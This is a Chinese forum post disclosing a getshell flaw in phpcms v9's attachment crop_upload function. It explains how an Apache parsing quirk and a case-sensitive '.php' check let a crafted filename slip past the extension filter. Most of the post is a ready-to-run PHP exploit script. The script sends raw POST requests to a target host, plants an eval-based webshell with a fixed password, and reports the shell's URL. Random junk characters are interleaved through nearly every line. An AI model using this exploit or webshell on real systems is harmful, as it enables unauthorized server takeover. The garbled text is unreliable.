漏洞类型: 文件上传导致任意代码执行
2 f7 r; l3 p3 j8 e6 L! P+ z; N
$ l9 T) j/ p# k2 v) v9 y简要描述:
5 O3 n% m2 M/ F2 x8 [4 v! O; e+ B& P# ~/ `3 s2 W
phpcms v9 getshell (apache)2 }5 m3 w5 H2 P0 X' F \; l5 A4 f
详细说明:
" D9 R/ l& z$ W* B' P l. c2 c4 N6 M; u; z2 N
漏洞文件:phpcms\modules\attachment\attachments.php
% _0 t, W2 C5 G
: N Y3 D5 l' x) M1 ^7 R( {public function crop_upload() { (isset($GLOBALS["HTTP_RAW_POST_DATA"])) { $pic = $GLOBALS["HTTP_RAW_POST_DATA"]; if (isset($_GET['width']) && !empty($_GET['width'])) { $width = intval($_GET['width']); } if (isset($_GET['height']) && !empty($_GET['height'])) { $height = intval($_GET['height']); } if (isset($_GET['file']) && !empty($_GET['file'])) { $_GET['file'] = str_replace(';','',$_GET['file']);//过滤了分号 if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();//is_image()检测是个关键 if (strpos($_GET['file'], pc_base::load_config('system', 'upload_url'))!==false) { $file = $_GET['file']; $basenamebasename = basename($file);//获取带有后缀的文件名 if (strpos($basename, 'thumb_')!==false) { $file_arr = explode('_', $basename); $basename = array_pop($file_arr); } $new_file = 'thumb_'.$width.'_'.$height.'_'.$basename; } else { pc_base::load_sys_class('attachment','',0); $module = trim($_GET['module']); $catid = intval($_GET['catid']); $siteid = $this->get_siteid(); $attachment = new attachment($module, $catid, $siteid); $uploadedfile['filename'] = basename($_GET['file']); $uploadedfile['fileext'] = fileext($_GET['file']); if (in_array($uploadedfile['fileext'], array('jpg', 'gif', 'jpeg', 'png', 'bmp'))) { $uploadedfile['isimage'] = 1; } $file_path = $this->upload_path.date('Y/md/'); pc_base::load_sys_func('dir'); dir_create($file_path); $new_file = date('Ymdhis').rand(100, 999).'.'.$uploadedfile['fileext']; $uploadedfile['filepath'] = date('Y/md/').$new_file; $aid = $attachment->add($uploadedfile); } $filepath = date('Y/md/'); file_put_contents($this->upload_path.$filepath.$new_file, $pic);//文件名可控、$pic可控 } else { return false; } echo pc_base::load_config('system', 'upload_url').$filepath.$new_file; exit; } }
; L2 K( V& K, O' k后缀检测:phpcms\modules\attachment\functions\global.func.php4 D4 f- u) o( i8 v; ?) l
* c8 e' O; |6 J. a; l1 x, F; Y* [
# p' D' a% U5 N6 o/ k9 U, U: W* r- m* F; J @
function is_image($file) { $ext_arr = array('jpg','gif','png','bmp','jpeg','tiff'); $ext = fileext($file);关键地方 return in_array($ext,$ext_arr) ? $ext_arr :false; } 7 }, P, z. ?4 s w f
- H) O: F' K7 @4 m q
关键函数:
5 d3 L' c7 z0 a% k3 s! H7 j& \- z( i$ T4 }0 j9 o4 e* I
; U* ]3 D% [3 n
W* {) ^0 i; S' K+ a; W" r& K4 S/ F9 ? Rfunction fileext($filename) { return strtolower(trim(substr(strrchr($filename, '.'), 1, 10))); }
7 d: ^2 u/ y3 U7 S
6 Z$ ]" U3 v+ p E5 W* c Fileext函数是对文件后缀名的提取。4 A( u; d! f/ a" t# c8 u
根据此函数我们如果上传文件名为ddd.Php.jpg%20%20%20%20%20%20%20Php) l8 j, Q' @9 I8 z, E
经过此函数提取到的后缀还是jpg,因此正在is_image()函数中后缀检测被绕过了。
: c% G/ e" C) ?3 U) s$ l我们回到public function crop_upload() 函数中. @8 c$ T. c: o& `& O
if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();
+ r1 p/ S, A; H在经过了is_image的判断之后又来了个.php的判断,在此程序员使用的是strpos函数
( t5 m% a6 c2 ^1 k这个函数是对大小写敏感的函数我们使用.Php就可以直接绕过了。+ y) i* f, _; V2 c3 u
经过上边的两层的过滤我们的ddd.Php.jpg%20%20%20%20%20%20%20Php后缀依然有效。; h, o. j/ B3 w8 Z- k$ |! p
最后$basename变量的值就为ddd.Php.jpg%20%20%20%20%20%20%20Php 然后使用file_put_contents函数写入到了指定目录。
( W* G- `9 [0 C# | v* Y. Y看见ddd.Php.jpg%20%20%20%20%20%20%20Php这个后缀,大家应该明白了,它用在apache搭建的服务器上可以被解析。8 ~) s @ I5 W6 X4 f! e3 M5 P m; @
漏洞证明:6 I# b1 \- r$ ~ O$ B
5 ~, w4 G/ a# D$ U7 {" Nexp:/ v; P( o+ y4 l3 {" o! Y
; M" T) ?0 i$ F, [9 y* \0 R, |' L<?php5 C! k2 G" |! P- P! g
error_reporting(E_ERROR);6 o7 d9 U! _# B
set_time_limit(0);3 {4 y9 ^* j9 }' w; V2 x8 e+ |
$pass="ln";
% ~; I$ @, [$ e& [% J! h8 zprint_r(', ^+ d7 E9 J: W" q
+---------------------------------------------------------------------------+
/ g6 G& H: ]5 {$ L {PHPCms V9 GETSHELL 0DAY ; x; \& M) v; b; K9 ?" w
code by L.N.
& W1 x) {; |2 I. f7 \/ i2 p9 P) x( F- s7 s% A+ G
apache 适用(利用的apache的解析漏洞) // 云安全 www.yunsec.net, j$ U" e4 H( F. _
+---------------------------------------------------------------------------+' J7 z% b' F( m% g
');
+ F- B2 Q) }0 D& uif ($argc < 2) {0 R) a& f, q* ?0 @; _' \
print_r('1 V/ [8 {, s& j; t+ c: @0 g6 ~
+---------------------------------------------------------------------------+
5 v9 X9 Y/ d3 ~2 UUsage: php '.$argv[0].' url path
9 U: b4 v. }& t+ s
5 z1 Z" i1 M; T" f' J0 }9 ~& ?Example:. F u, ]" K4 F& A3 t5 t: j
1.php '.$argv[0].' lanu.sinaapp.com$ i: m" I% h/ E# ^4 H1 x2 P
2.php '.$argv[0].' lanu.sinaapp.com /phpcms
, r6 {; t7 C9 M* A) \+---------------------------------------------------------------------------+ [0 h7 E' J" p& W
');9 G/ o: Y" I8 m4 |
exit;# F2 G9 l+ u* [* d3 n+ @2 d5 X% c
}
4 h$ G* W5 }, e+ B, d/ y
/ C: o4 K n5 C- m$url = $argv[1];( e; [" J) O0 a& R1 \
$path = $argv[2];% j. m% R7 D9 |% ?6 V4 r9 `
$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';
! W6 a' ]$ [( L& K" B5 H$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
% k' r$ `, h: X1 f d# Q8 x" t' Zif($ret=Create_dir($url,$path))" i! e1 d2 B8 Z! Q
{* J. }) O1 `/ K6 M2 P
//echo $ret;
5 J+ |, t* q2 g$ l% t$pattern = "|Server:[^,]+?|U";# D' y& M/ i( H, k/ Z6 q
preg_match_all($pattern, $ret, $matches);8 u3 H: Z7 y( d" F
if($matches[0][0])7 q+ i- E" `: l* I
{+ [! p7 f/ W* ]6 P. Y% m) [5 i, B
if(strpos($matches[0][0],'Apache') == false)5 a$ v* d7 I' p/ W$ y8 J
{' s$ O# C8 p0 Z% s7 E( l! E8 I9 {
echo "\n亲!此网站不是apache的网站。\n";exit;
; R7 A- w7 n8 O; H% ~, U3 ~}
$ m' e( V+ q; C* h0 s}
6 l" r" {- \- O6 v$ret = GetShell($url,$phpshell,$path,$file);
; U8 c9 j- R: `) e" R7 D# N$pattern = "|http:\/\/[^,]+?\.,?|U";
1 E- v8 J* W' vpreg_match_all($pattern, $ret, $matches);3 k3 r% Y$ G3 T; p
if($matches[0][0])+ {6 E, ^2 J& `! T
{* k7 {* i% T9 z C8 a. s6 A
echo "\n".'密码为: '.$pass."\n";
1 [' O" }( ~ q" a: e$ g, fecho "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
7 d$ z$ @( s6 i+ `1 R}$ l X2 J& O! s# K1 o/ p/ m/ n
else
7 y4 b: V2 p* }) o5 t: i$ ?{
8 }8 m5 m, K! |4 E+ X" k2 ?7 _$pattern = "|\/uploadfile\/[^,]+?\.,?|U";, A* ^! U, p0 P( W+ M0 j T
preg_match_all($pattern, $ret, $matches);7 X# f g1 ]6 M) p) ~) s! b
if($matches[0][0])' z! B: j! L2 N4 R8 p: g
{8 _0 k/ v4 Z2 O
echo "\n".'密码为: '.$pass."\n";9 H+ G8 n8 E/ \' F
echo "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;7 G% k# W; c( e8 R4 [% q5 C4 H+ C
}+ L. U' U3 o. R& J
else* N' |6 q4 m- s/ c
{
& K4 G9 f; }6 f( fecho "\r\n没得到!\n";exit;, `0 j p q0 [% B
}$ f f8 i% X8 T0 E5 d
}
/ s/ g- B2 S8 C1 d4 v}& o* i* s! T4 L4 ~
8 ]6 R- k& ?: j6 g5 f, V, r2 Nfunction GetShell($url,$shell,$path,$js), N. [9 S. ?& T! B+ }3 t$ b. w( o8 W
{
0 l f7 Y4 z" y$content =$shell;' |# ]: F1 L4 n2 R* H3 b
$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";* b$ c8 b- O( c5 y
$data .= "Host: ".$url."\r\n";: S; _; n, m/ X
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
) b: k( [" D" n1 Q0 s$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";" \6 M( @9 H& U2 {% R( K3 h
$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";0 B( i: H8 G4 z' T" O5 X5 u. @9 g
$data .= "Connection: close\r\n"; g5 h! U: F3 X8 `
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
r0 @, ]; U2 `6 S# _$data .= $content."\r\n";. y7 `" ?6 t& w; q" D* L& d
$ock=fsockopen($url,80);% g, A- J2 G+ P) g; ^8 W8 R
if (!$ock)0 ?, z; d ]; B; {
{
3 V7 d' B. j1 l0 q, o; B. \: U2 G+ }echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
2 f9 D2 {7 f) I( x& u} y, ]6 I9 K5 w
else
; J4 N/ X+ t: U# b0 A{
6 l" B+ j% [% T }fwrite($ock,$data);& Q1 |/ r3 J l: M' S; }0 J# P9 w
$resp = '';9 o/ F/ R6 F5 X! G; C
while (!feof($ock))3 U% w- C! F2 H) ~* O' j
{2 v- Y+ R. x9 S& s1 S! }
$resp.=fread($ock, 1024);
2 ]8 s5 N7 O* X9 ^, ~" G}" Q2 A: |2 @' m7 ^- L
return $resp;7 B6 ]% J: Z3 e3 O/ D% R
}
5 q; N6 b. J( x6 n6 q}9 m" b$ @+ Z4 l$ y
4 A5 |. P3 Z! } E6 ifunction Create_dir($url,$path='')
# Q2 U5 \8 g! V& i: A{ V5 p, ^* g) G
$content ='I love you';9 f7 R) a) S0 @, Z" r0 M8 m
$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";
* y3 ~) o' l* a6 z9 g# c* k) C$data .= "Host: ".$url."\r\n";
: b) T9 {3 w2 b7 k/ |$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";4 b \, X7 o h5 O9 o, k% c% B
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
5 ?# L; m/ A- M) k$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";! A1 e7 f3 P' T7 a2 ? v, x; y7 f
$data .= "Connection: close\r\n";# [% Z& T" i% N! u; [7 y+ L
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
0 L! u( I. O+ K$ F5 F$data .= $content."\r\n";
. B1 p/ O" y$ ~3 [( J: s$ock=fsockopen($url,80);# C2 f; m8 c- `1 @; W/ h
if (!$ock)
( {( I$ `! c' L. m: G{; u6 R3 m8 r& z" Z; d. W
echo "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
0 V& |: c. M* b$ b& M0 U}1 }- v: u" `+ ~
fwrite($ock,$data);8 v% f: I2 _4 T
$resp = '';
3 X5 A; r/ g, u* Owhile (!feof($ock))
/ o+ Q2 }, `2 I$ V& D* w1 [: K{
& h# ] z: T- z8 b/ `$resp.=fread($ock, 1024);
9 B# M. Z4 K7 z. i3 w1 Q& W" a}, d5 G1 q+ P7 ]$ w7 U. Z+ E
return $resp;
/ O5 ~, V0 \, K+ I}
: w, c) V+ M& `7 Q?> 5 L& I% [3 r5 h8 ?7 K' q# T( W
9 r2 K+ _7 ]1 X5 f* E" ^+ p/ z修复方案:
# _# Z9 X- h; x- F7 [" v E
9 l P* ]2 U' z( m* Q过滤过滤再过滤
' C, t; P3 ~0 ]& T: t! s: Z% b, ]- l9 S) _( |
|
发表于 2013-3-7 13:06:41
收藏
支持
反对